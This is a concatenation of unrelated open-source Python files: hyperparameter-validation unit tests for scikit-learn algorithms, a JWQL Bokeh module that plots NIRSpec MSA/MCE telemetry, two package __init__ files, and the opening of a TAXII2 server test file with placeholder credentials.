'max_leaf_nodes': None, 'max_samples': None, 'min_impurity_decrease': 0.0, 'min_impurity_split': None,
'min_samples_leaf': 1, 'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100,
'n_jobs': None, 'oob_score': False, 'random_state': None, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_3(self):
algorithm = "ExtraTrees"
params = {'bootstrap': False, 'ccp_alpha': 0.0, 'criterion': 'mse', 'max_depth': None, 'max_features': 'auto',
'max_leaf_nodes': None, 'max_samples': None, 'min_impurity_decrease': 0.0, 'min_impurity_split': None,
'min_samples_leaf': 1, 'min_samples_split': -2.89, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100,
'n_jobs': None, 'oob_score': False, 'random_state': None, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_4(self):
algorithm = "ExtraTrees"
params = {'bootstrap': False, 'ccp_alpha': 0.0, 'criterion': 'mse', 'max_depth': None, 'max_features': 'auto',
'max_leaf_nodes': None, 'max_samples': None, 'min_impurity_decrease': 0.0, 'min_impurity_split': None,
'min_samples_leaf': 1, 'min_samples_split': 2, 'min_weight_fraction_leaf': -0.89, 'n_estimators': 100,
'n_jobs': None, 'oob_score': False, 'random_state': None, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_5(self):
algorithm = "ExtraTrees"
params = {'bootstrap': False, 'ccp_alpha': 78, 'criterion': 'mse', 'max_depth': None, 'max_features': 'auto',
'max_leaf_nodes': None, 'max_samples': None, 'min_impurity_decrease': 0.0, 'min_impurity_split': None,
'min_samples_leaf': 1.8, 'min_samples_split': 2.9, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 78,
'n_jobs': None, 'oob_score': False, 'random_state': None, 'verbose': 0, 'warm_start': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ----------------- AdaBoost -------------------#
def test_adaboost_1(self):
algorithm = "AdaBoost"
params = {'base_estimator': None, 'learning_rate': 1.0, 'loss': 'linear', 'n_estimators': 50,
'random_state': None}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_adaboost_2(self):
algorithm = "AdaBoost"
params = {'base_estimator': None, 'learning_rate': -1.0, 'loss': 'linear', 'n_estimators': -50,
'random_state': None}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_adaboost_3(self):
algorithm = "AdaBoost"
params = {'base_estimator': None, 'learning_rate': 1.0, 'loss': 'linear', 'n_estimators': -50,
'random_state': None}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
# ----------------- SupportVectorMachines -------------------#
def test_supportvectormachines_1(self):
algorithm = "SupportVectorMachines"
params = {'C': 1.0, 'cache_size': 200, 'coef0': 0.0, 'degree': 3, 'epsilon': 0.1, 'gamma': 'scale',
'kernel': 'rbf', 'max_iter': -1, 'shrinking': True, 'tol': 0.001, 'verbose': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_supportvectormachines_2(self):
algorithm = "SupportVectorMachines"
params = {'C': 1.0, 'cache_size': -200, 'coef0': -0.8, 'degree': -3, 'epsilon': -0.1, 'gamma': 'scale',
'kernel': 'rbf', 'max_iter': -1, 'shrinking': True, 'tol': -0.001, 'verbose': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_supportvectormachines_3(self):
algorithm = "SupportVectorMachines"
params = {'C': 1.0, 'cache_size': 200, 'coef0': 0.0, 'degree': 3, 'epsilon': -0.1, 'gamma': 'scale',
'kernel': 'rbf', 'max_iter': -1, 'shrinking': True, 'tol': 0.001, 'verbose': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_supportvectormachines_4(self):
algorithm = "SupportVectorMachines"
params = {'C': 1.0, 'cache_size': 200, 'coef0': 0.0, 'degree': 3, 'epsilon': 0.1, 'gamma': 'scale',
'kernel': 'rbf', 'max_iter': -1, 'shrinking': True, 'tol': -0.001, 'verbose': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
#----------------- LinearRegression --------------------#
def test_linearregression_1(self):
algorithm = "LinearRegression"
params = {'copy_X': 1.0, 'fit_intercept': 200, 'normalize': 0.0, 'positive': 3}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_linearregression_2(self):
algorithm = "LinearRegression"
params = {'copy_X': True, 'fit_intercept': True, 'normalize': False, 'positive': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_linearregression_3(self):
algorithm = "LinearRegression"
params = {'copy_X': "randomvalue", 'fit_intercept': True, 'normalize': False, 'positive': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
# ----------------- XGradientBoosting -------------------#
def test_xgradientboosting_1(self):
algorithm = "XGradientBoosting"
params = {'objective': 'binary:logistic', 'base_score': 123, 'booster': None, 'colsample_bylevel': None,
'colsample_bynode': None, 'colsample_bytree': None, 'gamma': None, 'learning_rate': None,
'max_delta_step': None, 'max_depth': None, 'min_child_weight': None, 'missing': None,
'n_estimators': 100, 'n_jobs': None, 'random_state': None, 'reg_alpha': None, 'reg_lambda': None,
'scale_pos_weight': None, 'subsample': None, 'tree_method': None}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
class TestScikitClusteringAlgo(unittest.TestCase):
def setUp(self):
self.library = "scikit"
self.service = "clustering"
# ----------------- KMeans -------------------#
def test_kmeans_1(self):
algorithm = "KMeansClustering"
params = {"algorithm":"auto","copy_x":True,"init":"k-means++","max_iter":300,"n_clusters":8,"n_init":10,"tol":0.0001,"verbose":0}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ----------------- AffinityPropagation -------------------#
def test_affinity_propagation_1(self):
algorithm = "AffinityPropagation"
params = {'affinity':"euclidean","convergence_iter":15,"copy":True,"damping":0.5,"max_iter":200,"preference":None,"verbose":False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ----------------- MeanShift -------------------#
def test_mean_shift_1(self):
algorithm = "MeanShift"
params = {'bandwidth':None,'bin_seeding':False,'cluster_all':True,'max_iter':300,'min_bin_freq':1,'n_jobs':None}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ----------------- Birch -------------------#
def test_Birch_1(self):
algorithm = "Birch"
params = {'branching_factor':50,'compute_labels':True,'copy':True,'n_clusters':3,'threshold':0.5}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ----------------- SpectralClustering -------------------#
def test_spectral_clustering_1(self):
algorithm = "SpectralClustering"
params = {'affinity':"rbf","assign_labels":"kmeans","coef0":1,"degree":3,"eigen_solver":None,"eigen_tol":0.0,"gamma":1.0,"n_clusters":8,"n_components":None,"n_init":10,"n_jobs":None,"n_neighbors":10,"verbose":False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ----------------- AgglomerativeClustering -------------------#
def test_agglomerative_clustering_1(self):
algorithm = "AgglomerativeClustering"
params = {'affinity':"euclidean",'compute_distances':False,'compute_full_tree':False,"distance_threshold":None,"linkage":"single","n_clusters":2}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ----------------- DBSCAN -------------------#
def test_dbscan_1(self):
algorithm = "DBScan"
params = {'algorithm':'brute','eps':0.5,'leaf_size':30,'metric':"euclidean",'min_samples':5,'n_jobs':None,'p':2}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ----------------- OPTICS -------------------#
def test_optics_1(self):
algorithm = "Optics"
params = {'algorithm':'auto','cluster_method':'xi','eps':None,'leaf_size':30,'max_eps':23,'metric':'minkowski','min_cluster_size':None,'min_samples':5,'n_jobs':None,'p':2,'predecessor_correction':True,'xi':0.05}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ----------------- GaussianMixture -------------------#
def test_gaussian_mixture_1(self):
algorithm = "GaussianMixtures"
params = {'covariance_type':"full",'init_params':"kmeans",'max_iter':100,'n_components':1,'n_init':1,'reg_covar':0.000001,'tol':0.001,'verbose':0,'verbose_interval':10,'warm_start':False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
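The clustering checks above all repeat the same call/assert shape. A self-contained sketch of a table-driven alternative using `unittest.subTest`; the trivial `validate` stub is a hypothetical stand-in for the real `hyper_parameter_check` (whose implementation is not shown here):

```python
import unittest

def validate(algorithm, params):
    # Hypothetical stand-in for hyper_parameter_check:
    # accept only boolean values for 'copy_x'.
    return isinstance(params.get("copy_x", True), bool)

class TestTableDriven(unittest.TestCase):
    # (algorithm, params, expected result) triples drive one parameterized test.
    CASES = [
        ("KMeansClustering", {"copy_x": True}, True),
        ("KMeansClustering", {"copy_x": "randomvalue"}, False),
    ]

    def test_cases(self):
        for algorithm, params, expected in self.CASES:
            with self.subTest(algorithm=algorithm, params=params):
                self.assertEqual(validate(algorithm, params), expected)
```

Each failing row is then reported individually by `subTest`, instead of needing one method per algorithm/parameter combination.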
if __name__ == '__main__':
unittest.main()

# --- jwql/instrument_monitors/nirspec_monitors/data_trending/plots/msa_mce_tab.py
# --- (repo: falkben/jwql, license: BSD-3-Clause)
#! /usr/bin/env python
"""Prepares plots for Temperature tab
Module prepares plots for mnemonics below. Combines plots in a grid and
returns tab object.
Plot 1 - MCE Board 1 (AIC) Voltages
INRSM_MCE_AIC_1R5_V
INRSM_MCE_AIC_3R3_V
INRSM_MCE_AIC_5_V
INRSM_MCE_AIC_P12_V
INRSM_MCE_AIC_N12_V
Plot 2 - MCE Board 1 (AIC) Currents
INRSM_MCE_AIC_3R3_I
INRSM_MCE_AIC_5_I
INRSM_MCE_AIC_P12_I
INRSM_MCE_AIC_N12_I
Plot 3 - MCE Board 2 (MDAC) Voltages
INRSM_MCE_MDAC_1R5_V
INRSM_MCE_MDAC_3R3_V
INRSM_MCE_MDAC_5_V
INRSM_MCE_MDAC_P12_V
INRSM_MCE_MDAC_N12_V
Plot 4 - MCE Board 2 (MDAC) Currents
INRSM_MCE_MDAC_3R3_I
INRSM_MCE_MDAC_5_I
INRSM_MCE_MDAC_P12_I
INRSM_MCE_MDAC_N12_I
Plot (5-8) - QUAD (1-4)
INRSM_MSA_Q(1-4)_365VDD
INRSM_MSA_Q(1-4)_365VPP
INRSM_MSA_Q(1-4)_171VPP
IGDPM_MSA_Q(1-4)_365IDD
IGDPM_MSA_Q(1-4)_365IPP
IGDPM_MSA_Q(1-4)_171RTN
Authors
-------
- Daniel Kühbacher
Use
---
The functions within this module are intended to be imported and
used by ``nirspec_dashboard.py``, e.g.:
::
from .plots.msa_mce_tab import msa_mce_plots
tab = msa_mce_plots(conn, start, end)
Dependencies
------------
User must provide database "nirspec_database.db"
"""
import jwql.instrument_monitors.nirspec_monitors.data_trending.plots.plot_functions as pf
from bokeh.plotting import figure
from bokeh.models import Title
from bokeh.models.widgets import Panel, Div
from bokeh.layouts import gridplot, Column
def aic_voltage(conn, start, end):
'''Create specific plot and return plot object
Parameters
----------
conn : DBobject
Connection object that represents database
start : time
Startlimit for x-axis and query (typ. datetime.now()- 4Months)
end : time
Endlimit for x-axis and query (typ. datetime.now())
Return
------
p : Plot object
Bokeh plot
'''
# create a new plot with a title and axis labels
p = figure( tools = "pan,wheel_zoom,box_zoom,reset,save",
toolbar_location = "above",
plot_width = 560,
plot_height = 700,
x_axis_type = 'datetime',
output_backend = "webgl",
x_axis_label = 'Date', y_axis_label='Voltage (V)')
p.grid.visible = True
p.title.text = "MCE Board 1 (AIC)"
p.add_layout(Title(text="Voltages", text_font_style="italic", text_font_size="12pt"), 'above')
pf.add_basic_layout(p)
a = pf.add_to_plot(p, "1R5_V", "INRSM_MCE_AIC_1R5_V", start, end, conn, color = "red")
b = pf.add_to_plot(p, "3R3_V", "INRSM_MCE_AIC_3R3_V", start, end, conn, color = "orange")
c = pf.add_to_plot(p, "5_V", "INRSM_MCE_AIC_5_V", start, end, conn, color = "brown")
d = pf.add_to_plot(p, "P12_V", "INRSM_MCE_AIC_P12_V", start, end, conn, color = "burlywood")
e = pf.add_to_plot(p, "N12_V", "INRSM_MCE_AIC_N12_V", start, end, conn, color = "darkmagenta")
pf.add_hover_tool(p,[a,b,c,d,e])
p.legend.location = "bottom_right"
p.legend.click_policy = "hide"
return p
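Every plotting function in this module repeats the same `figure(...)` scaffolding. One way to factor it out is a small keyword-argument builder; `figure_kwargs` below is a hypothetical helper, not part of the original module:

```python
def figure_kwargs(y_axis_label, plot_height=700):
    """Shared keyword arguments for the near-identical figure() calls in this module."""
    return dict(
        tools="pan,wheel_zoom,box_zoom,reset,save",
        toolbar_location="above",
        plot_width=560,
        plot_height=plot_height,
        x_axis_type="datetime",
        output_backend="webgl",
        x_axis_label="Date",
        y_axis_label=y_axis_label,
    )
```

Each function would then start with `p = figure(**figure_kwargs('Voltage (V)'))` (or `plot_height=500` for the quad plots), keeping only the per-plot title and trace list.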
def aic_current(conn, start, end):
'''Create specific plot and return plot object
Parameters
----------
conn : DBobject
Connection object that represents database
start : time
Startlimit for x-axis and query (typ. datetime.now()- 4Months)
end : time
Endlimit for x-axis and query (typ. datetime.now())
Return
------
p : Plot object
Bokeh plot
'''
# create a new plot with a title and axis labels
p = figure( tools = "pan,wheel_zoom,box_zoom,reset,save",
toolbar_location = "above",
plot_width = 560,
plot_height = 700,
x_axis_type = 'datetime',
output_backend = "webgl",
x_axis_label = 'Date', y_axis_label='Current (A)')
p.grid.visible = True
p.title.text = "MCE Board 1 (AIC)"
p.add_layout(Title(text="Currents", text_font_style="italic", text_font_size="12pt"), 'above')
pf.add_basic_layout(p)
a = pf.add_to_plot(p, "3R3_I", "INRSM_MCE_AIC_3R3_I", start, end, conn, color = "blue")
b = pf.add_to_plot(p, "5_I", "INRSM_MCE_AIC_5_I", start, end, conn, color = "red")
c = pf.add_to_plot(p, "P12_I", "INRSM_MCE_AIC_P12_I", start, end, conn, color = "green")
d = pf.add_to_plot(p, "N12_I", "INRSM_MCE_AIC_N12_I", start, end, conn, color = "orange")
pf.add_hover_tool(p,[a,b,c,d])
p.legend.location = "bottom_right"
p.legend.click_policy = "hide"
return p
def mdac_voltage(conn, start, end):
'''Create specific plot and return plot object
Parameters
----------
conn : DBobject
Connection object that represents database
start : time
Startlimit for x-axis and query (typ. datetime.now()- 4Months)
end : time
Endlimit for x-axis and query (typ. datetime.now())
Return
------
p : Plot object
Bokeh plot
'''
# create a new plot with a title and axis labels
p = figure( tools = "pan,wheel_zoom,box_zoom,reset,save",
toolbar_location = "above",
plot_width = 560,
plot_height = 700,
x_axis_type = 'datetime',
output_backend = "webgl",
x_axis_label = 'Date', y_axis_label='Voltage (V)')
p.grid.visible = True
p.title.text = "MCE Board 2 (MDAC)"
p.add_layout(Title(text="Voltages", text_font_style="italic", text_font_size="12pt"), 'above')
pf.add_basic_layout(p)
a = pf.add_to_plot(p, "1R5_V", "INRSM_MCE_MDAC_1R5_V", start, end, conn, color = "red")
b = pf.add_to_plot(p, "3R3_V", "INRSM_MCE_MDAC_3R3_V", start, end, conn, color = "orange")
c = pf.add_to_plot(p, "5_V", "INRSM_MCE_MDAC_5_V", start, end, conn, color = "brown")
d = pf.add_to_plot(p, "P12_V", "INRSM_MCE_MDAC_P12_V", start, end, conn, color = "burlywood")
e = pf.add_to_plot(p, "N12_V", "INRSM_MCE_MDAC_N12_V", start, end, conn, color = "darkmagenta")
pf.add_hover_tool(p,[a,b,c,d,e])
p.legend.location = "bottom_right"
p.legend.click_policy = "hide"
return p
def mdac_current(conn, start, end):
'''Create specific plot and return plot object
Parameters
----------
conn : DBobject
Connection object that represents database
start : time
Startlimit for x-axis and query (typ. datetime.now()- 4Months)
end : time
Endlimit for x-axis and query (typ. datetime.now())
Return
------
p : Plot object
Bokeh plot
'''
# create a new plot with a title and axis labels
p = figure( tools = "pan,wheel_zoom,box_zoom,reset,save",
toolbar_location = "above",
plot_width = 560,
plot_height = 700,
x_axis_type = 'datetime',
output_backend = "webgl",
x_axis_label = 'Date', y_axis_label='Current (A)')
p.grid.visible = True
p.title.text = "MCE Board 2 (MDAC)"
p.add_layout(Title(text="Currents", text_font_style="italic", text_font_size="12pt"), 'above')
pf.add_basic_layout(p)
a = pf.add_to_plot(p, "3R3_I", "INRSM_MCE_MDAC_3R3_I", start, end, conn, color = "blue")
b = pf.add_to_plot(p, "5_I", "INRSM_MCE_MDAC_5_I", start, end, conn, color = "red")
c = pf.add_to_plot(p, "P12_I", "INRSM_MCE_MDAC_P12_I", start, end, conn, color = "green")
d = pf.add_to_plot(p, "N12_I", "INRSM_MCE_MDAC_N12_I", start, end, conn, color = "orange")
pf.add_hover_tool(p,[a,b,c,d])
p.legend.location = "bottom_right"
p.legend.click_policy = "hide"
return p
def quad1_volt(conn, start, end):
'''Create specific plot and return plot object
Parameters
----------
conn : DBobject
Connection object that represents database
start : time
Startlimit for x-axis and query (typ. datetime.now()- 4Months)
end : time
Endlimit for x-axis and query (typ. datetime.now())
Return
------
p : Plot object
Bokeh plot
'''
# create a new plot with a title and axis labels
p = figure( tools = "pan,wheel_zoom,box_zoom,reset,save",
toolbar_location = "above",
plot_width = 560,
plot_height = 500,
x_axis_type = 'datetime',
output_backend = "webgl",
x_axis_label = 'Date', y_axis_label='Voltage (V) / Current (A)')
p.grid.visible = True
p.title.text = "Quad 1"
pf.add_basic_layout(p)
a = pf.add_to_plot(p, "365VDD", "INRSM_MSA_Q1_365VDD", start, end, conn, color = "red")
b = pf.add_to_plot(p, "365VPP", "INRSM_MSA_Q1_365VPP", start, end, conn, color = "orange")
c = pf.add_to_plot(p, "171VPP", "INRSM_MSA_Q1_171VPP", start, end, conn, color = "brown")
d = pf.add_to_plot(p, "365IDD", "IGDPM_MSA_Q1_365IDD", start, end, conn, color = "burlywood")
e = pf.add_to_plot(p, "365IPP", "IGDPM_MSA_Q1_365IPP", start, end, conn, color = "darkmagenta")
f = pf.add_to_plot(p, "171RTN", "IGDPM_MSA_Q1_171RTN", start, end, conn, color = "blue")
pf.add_hover_tool(p,[a,b,c,d,e,f])
p.legend.location = "bottom_right"
p.legend.click_policy = "hide"
return p
def quad2_volt(conn, start, end):
'''Create specific plot and return plot object
Parameters
----------
conn : DBobject
Connection object that represents database
start : time
Startlimit for x-axis and query (typ. datetime.now()- 4Months)
end : time
Endlimit for x-axis and query (typ. datetime.now())
Return
------
p : Plot object
Bokeh plot
'''
# create a new plot with a title and axis labels
p = figure( tools = "pan,wheel_zoom,box_zoom,reset,save",
toolbar_location = "above",
plot_width = 560,
plot_height = 500,
x_axis_type = 'datetime',
output_backend = "webgl",
x_axis_label = 'Date', y_axis_label='Voltage (V) / Current (A)')
p.grid.visible = True
p.title.text = "Quad 2"
pf.add_basic_layout(p)
a = pf.add_to_plot(p, "365VDD", "INRSM_MSA_Q2_365VDD", start, end, conn, color = "red")
b = pf.add_to_plot(p, "365VPP", "INRSM_MSA_Q2_365VPP", start, end, conn, color = "orange")
c = pf.add_to_plot(p, "171VPP", "INRSM_MSA_Q2_171VPP", start, end, conn, color = "brown")
d = pf.add_to_plot(p, "365IDD", "IGDPM_MSA_Q2_365IDD", start, end, conn, color = "burlywood")
e = pf.add_to_plot(p, "365IPP", "IGDPM_MSA_Q2_365IPP", start, end, conn, color = "darkmagenta")
f = pf.add_to_plot(p, "171RTN", "IGDPM_MSA_Q2_171RTN", start, end, conn, color = "blue")
pf.add_hover_tool(p,[a,b,c,d,e,f])
p.legend.location = "bottom_right"
p.legend.click_policy = "hide"
return p
def quad3_volt(conn, start, end):
'''Create specific plot and return plot object
Parameters
----------
conn : DBobject
Connection object that represents database
start : time
Startlimit for x-axis and query (typ. datetime.now()- 4Months)
end : time
Endlimit for x-axis and query (typ. datetime.now())
Return
------
p : Plot object
Bokeh plot
'''
# create a new plot with a title and axis labels
p = figure( tools = "pan,wheel_zoom,box_zoom,reset,save",
toolbar_location = "above",
plot_width = 560,
plot_height = 500,
x_axis_type = 'datetime',
output_backend = "webgl",
x_axis_label = 'Date', y_axis_label='Voltage (V) / Current (A)')
p.grid.visible = True
p.title.text = "Quad 3"
pf.add_basic_layout(p)
a = pf.add_to_plot(p, "365VDD", "INRSM_MSA_Q3_365VDD", start, end, conn, color = "red")
b = pf.add_to_plot(p, "365VPP", "INRSM_MSA_Q3_365VPP", start, end, conn, color = "orange")
c = pf.add_to_plot(p, "171VPP", "INRSM_MSA_Q3_171VPP", start, end, conn, color = "brown")
d = pf.add_to_plot(p, "365IDD", "IGDPM_MSA_Q3_365IDD", start, end, conn, color = "burlywood")
e = pf.add_to_plot(p, "365IPP", "IGDPM_MSA_Q3_365IPP", start, end, conn, color = "darkmagenta")
f = pf.add_to_plot(p, "171RTN", "IGDPM_MSA_Q3_171RTN", start, end, conn, color = "blue")
pf.add_hover_tool(p,[a,b,c,d,e,f])
p.legend.location = "bottom_right"
p.legend.click_policy = "hide"
return p
def quad4_volt(conn, start, end):
'''Create specific plot and return plot object
Parameters
----------
conn : DBobject
Connection object that represents database
start : time
Startlimit for x-axis and query (typ. datetime.now()- 4Months)
end : time
Endlimit for x-axis and query (typ. datetime.now())
Return
------
p : Plot object
Bokeh plot
'''
# create a new plot with a title and axis labels
p = figure( tools = "pan,wheel_zoom,box_zoom,reset,save",
toolbar_location = "above",
plot_width = 560,
plot_height = 500,
x_axis_type = 'datetime',
output_backend = "webgl",
x_axis_label = 'Date', y_axis_label='Voltage (V) / Current (A)')
p.grid.visible = True
p.title.text = "Quad 4"
pf.add_basic_layout(p)
a = pf.add_to_plot(p, "365VDD", "INRSM_MSA_Q4_365VDD", start, end, conn, color = "red")
b = pf.add_to_plot(p, "365VPP", "INRSM_MSA_Q4_365VPP", start, end, conn, color = "orange")
c = pf.add_to_plot(p, "171VPP", "INRSM_MSA_Q4_171VPP", start, end, conn, color = "brown")
d = pf.add_to_plot(p, "365IDD", "IGDPM_MSA_Q4_365IDD", start, end, conn, color = "burlywood")
e = pf.add_to_plot(p, "365IPP", "IGDPM_MSA_Q4_365IPP", start, end, conn, color = "darkmagenta")
f = pf.add_to_plot(p, "171RTN", "IGDPM_MSA_Q4_171RTN", start, end, conn, color = "blue")
pf.add_hover_tool(p,[a,b,c,d,e,f])
p.legend.location = "bottom_right"
p.legend.click_policy = "hide"
return p
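`quad1_volt` through `quad4_volt` differ only in the quad index embedded in the mnemonic names. A hypothetical helper that derives the (legend label, mnemonic, color) triples for any quad; the plotting loop it would feed is assumed to use the same `pf.add_to_plot` interface as above:

```python
def quad_mnemonics(quad):
    """Return (legend_label, mnemonic, color) triples for MSA quad 1-4."""
    voltages = [("365VDD", "red"), ("365VPP", "orange"), ("171VPP", "brown")]
    currents = [("365IDD", "burlywood"), ("365IPP", "darkmagenta"), ("171RTN", "blue")]
    # Voltage mnemonics carry the INRSM_ prefix, current mnemonics the IGDPM_ prefix.
    triples = [(label, "INRSM_MSA_Q%d_%s" % (quad, label), color)
               for label, color in voltages]
    triples += [(label, "IGDPM_MSA_Q%d_%s" % (quad, label), color)
                for label, color in currents]
    return triples
```

A single `quad_volt(conn, start, end, quad)` function could then loop over `quad_mnemonics(quad)` instead of duplicating six `pf.add_to_plot` calls four times.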
def msa_mce_plots(conn, start, end):
'''Combines plots to a tab
Parameters
----------
conn : DBobject
Connection object that represents database
start : time
Startlimit for x-axis and query (typ. datetime.now()- 4Months)
end : time
Endlimit for x-axis and query (typ. datetime.now())
Return
------
p : tab object
used by dashboard.py to set up dashboard
'''
descr = Div(text=
"""
<style>
table, th, td {
border: 1px solid black;
background-color: #efefef;
border-collapse: collapse;
padding: 5px
}
table {
border-spacing: 15px;
}
</style>
<body>
<table style="width:100%">
<tr>
<th><h6>Plotname</h6></th>
<th><h6>Mnemonic</h6></th>
<th><h6>Description</h6></th>
</tr>
<tr>
<td>MCE Board 1 (AIC) Voltages</td>
<td>INRSM_MCE_AIC_1R5_V<br>
INRSM_MCE_AIC_3R3_V<br>
INRSM_MCE_AIC_5_V<br>
INRSM_MCE_AIC_P12_V<br>
INRSM_MCE_AIC_N12_V<br>
</td>
<td>MCE AIC +1.5V Voltage<br>
MCE AIC +3.3V Voltage<br>
MCE AIC +5V Voltage<br>
MCE AIC +12V Voltage<br>
MCE AIC -12V Voltage<br>
</td>
</tr>
<tr>
<td>MCE Board 1 (AIC) Currents</td>
<td>INRSM_MCE_AIC_3R3_I<br>
INRSM_MCE_AIC_5_I<br>
INRSM_MCE_AIC_P12_I<br>
INRSM_MCE_AIC_N12_I<br>
</td>
<td>MCE AIC Board +3.3V Current<br>
MCE AIC Board +5V Current<br>
MCE AIC Board +12V Current<br>
MCE AIC Board -12V Current<br>
</td>
</tr>
<tr>
<td>MCE Board 2 (MDAC) Voltages</td>
<td>INRSM_MCE_MDAC_1R5_V<br>
INRSM_MCE_MDAC_3R3_V<br>
INRSM_MCE_MDAC_5_V<br>
INRSM_MCE_MDAC_P12_V<br>
INRSM_MCE_MDAC_N12_V<br>
</td>
<td>MCE MDAC +1.5V Voltage<br>
MCE MDAC +3.3V Voltage<br>
MCE MDAC +5V Voltage<br>
MCE MDAC +12V Voltage<br>
MCE MDAC -12V Voltage<br>
</td>
</tr>
<tr>
<td>MCE Board 2 (MDAC) Currents</td>
<td>INRSM_MCE_MDAC_3R3_I<br>
INRSM_MCE_MDAC_5_I<br>
INRSM_MCE_MDAC_P12_I<br>
INRSM_MCE_MDAC_N12_I<br>
</td>
<td>MCE MDAC Board +3.3V Current<br>
MCE MDAC Board +5V Current<br>
MCE MDAC Board +12V Current<br>
MCE MDAC Board -12V Current<br>
</td>
</tr>
<tr>
<td>QUAD (1-4)</td>
<td>INRSM_MSA_Q(1-4)_365VDD<br>
INRSM_MSA_Q(1-4)_365VPP<br>
INRSM_MSA_Q(1-4)_171VPP<br>
IGDPM_MSA_Q(1-4)_365IDD<br>
IGDPM_MSA_Q(1-4)_365IPP<br>
IGDPM_MSA_Q(1-4)_171RTN<br>
</td>
<td>MSA Quad (1-4) Vdd 365 Voltage<br>
MSA Quad (1-4) Vpp 365 Voltage<br>
MSA Quad (1-4) Vpp 171 Voltage<br>
MSA Quad (1-4) Vdd 365 Current<br>
MSA Quad (1-4) Vpp 365 Current<br>
MSA Quad (1-4) Return 171 Current<br>
</td>
</tr>
</table>
</body>
""", width=1100)
plot1 = aic_voltage(conn, start, end)
plot2 = aic_current(conn, start, end)
plot3 = mdac_voltage(conn, start, end)
plot4 = mdac_current(conn, start, end)
plot5 = quad1_volt(conn, start, end)
plot6 = quad2_volt(conn, start, end)
plot7 = quad3_volt(conn, start, end)
plot8 = quad4_volt(conn, start, end)
grid = gridplot([[plot1, plot2],
[plot3, plot4],
[plot5, plot6],
[plot7, plot8]],merge_tools=False)
layout = Column(descr, grid)
tab = Panel(child = layout, title = "MSA/MCE")
return tab
# --- vstreamer_utils/model/__init__.py (repo: artudi54/video-streamer, license: MIT)
] | 1 | 2019-10-08T10:49:56.000Z | 2019-10-08T10:49:56.000Z | from vstreamer_utils.model.DirectoryInfo import DirectoryInfo
from vstreamer_utils.model.DirectoryTree import DirectoryTree
from vstreamer_utils.model.AdditionalEntryProperties import AdditionalEntryProperties
from vstreamer_utils.model.FileEntry import FileEntry, DirectoryEntry, VideoFileEntry
# --- dist/Basilisk/fswAlgorithms/sunlineSuKF/__init__.py (repo: ian-cooke/basilisk_mag, license: 0BSD)
] | null | null | null | # This __init__.py file for the sunlineSuKF package is automatically generated by the build system
from sunlineSuKF import *

# --- Packs/TAXIIServer/Integrations/TAXII2Server/TAXII2Server_test.py
# --- (repo: cstone112/content, license: MIT)
] | 2 | 2022-01-05T15:27:01.000Z | 2022-02-01T19:27:43.000Z | import copy
import io
import json
import pytest
from requests.auth import _basic_auth_str
from TAXII2Server import TAXII2Server, APP, uuid, create_fields_list
import demistomock as demisto
HEADERS = {
'Authorization': _basic_auth_str("username", "password"),
'Accept': '*/*',
}
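`_basic_auth_str` is a private requests helper; the header it builds is plain RFC 7617 Basic auth and can be reproduced with the standard library. A sketch for reference, not the actual requests internals:

```python
import base64

def basic_auth_header(username, password):
    # "Basic " + base64("user:password"), as sent in the Authorization header.
    token = base64.b64encode(("%s:%s" % (username, password)).encode("latin1"))
    return "Basic " + token.decode("ascii")
```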
@pytest.fixture
def taxii2_server_v20(mocker):
mocker.patch.object(demisto, 'getLicenseID', return_value='test')
server = TAXII2Server(url_scheme='http',
host='demisto',
port=7000,
collections={'Collection1': 'type:IP', 'Collection2': 'sourceBrands:"Some Feed"'},
certificate='',
private_key='',
http_server=True,
credentials={'identifier': 'username',
'password': 'password'},
version='2.0',
service_address=None,
fields_to_present=set())
return server
@pytest.fixture
def taxii2_server_v21(mocker):
mocker.patch.object(demisto, 'getLicenseID', return_value='test')
server = TAXII2Server(url_scheme='http',
host='demisto',
port=7000,
collections={'Collection1': 'type:IP', 'Collection2': {'query': 'sourceBrands:"Some Feed"',
'description': 'Test desc'}},
certificate='',
private_key='',
http_server=True,
credentials={'identifier': 'username',
'password': 'password'},
version='2.1',
service_address=None,
fields_to_present=set())
return server
def util_load_json(path):
with io.open(path, mode='r', encoding='utf-8') as f:
return json.loads(f.read())
@pytest.mark.parametrize('fields, result', [("", {'name', 'type'}), ('all', set()),
('name,type,sha1', {'name', 'type', 'sha1'}),
('value,type,sha1', {'name', 'type', 'sha1'}),
('value,indicator_type,createdTime', {'name', 'type', 'createdTime'})])
def test_create_fields_list(fields, result):
"""
Given
fields list parameter, expected result
When
User enters filter_field param
Then
Validate right result returned
"""
assert result == create_fields_list(fields)
